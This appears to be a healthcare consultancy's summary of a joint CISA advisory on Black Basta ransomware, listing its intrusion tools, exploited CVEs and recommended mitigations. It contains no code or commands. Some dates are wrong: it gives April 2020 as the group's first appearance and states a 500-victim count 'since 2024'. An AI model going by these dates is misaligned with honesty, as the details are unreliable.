Ascension Update: CISA Shares IOCs and Recommended Actions
A historic multi-agency alert from Cybersecurity Infrastructure and Security Agency (CISA), FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) urges all critical infrastructure entities to be on high alert as Black Basta has encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including healthcare.
Black Basta has been identified as the threat actors behind the ongoing outages at Ascension and its hospitals across the U.S.
The group was first identified in April 2020 and is a ransomware-as-a-service (RaaS) variant. Its affiliates have successfully disrupted operations across a wide range of businesses and critical infrastructure across the globe. More than 500 entities have fallen victim to Black Basta since 2024.
CISA has issued a list of 44 indicators of compromise, about 45 network indicators, and about 30 file indicators, as well as known Black Basta Cobalt Strike domains. Healthcare network defenders should review the list here: #StopRansomware: Black Basta | CISA and apply recommended mitigations.
Further Considerations for Healthcare Entities
- To exploit networks, the group leverages common exploit tactics like phishing and vulnerability exploit, then use double extortion through exfiltrating data and encrypting systems.
- Spear-phishing is the primary method for Black Basta affiliates to gain initial access, but the actors have also been known to utilize Qakbot.
- In February 2024, Black Basta began exploiting ConnectWise vulnerability CVE-2024-1709, as well as abusing valid credentials.
- To scan networks and conduct reconnaissance, the threat actors use a SoftPerfect network scanner (netscan.exe) and utilities with innocuous file names such as Intel or Dell, left in the root drive C:\.
- For Lateral Movement: BITSAdmin, PsExec, and Remote Desktop Protocol (RDP) are used, while lesser known proliferation tools include Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.
- The actors use credential scraper Mimikatz for privilege escalation and have been observed exploiting ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation
The alert stresses that healthcare and other critical infrastructure entities should apply these recommendations today to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Measures to mitigate ransomware and cyber threats include:
- Installing updates for operating systems, software, and firmware when released
- Requiring multi-factor authentication for as many services as possible
- Train users to recognize and report phishing attempts
- Secure remote access software by applying mitigations
- Make backups of critical systems and device configurations [CPG 2.R] to enable devices to be repaired and restored.
- Apply mitigations from the joint #StopRansomware Guide
Full recommendations, as well as links to remediation guidance can be found on CISA’s Stop Ransomware site.
First Health encourages all healthcare entities to review and adopt these guidelines, where appropriate. Reach out to our leadership team if you have any questions about next steps or prioritization. We’re here to help support your mission to protect patients.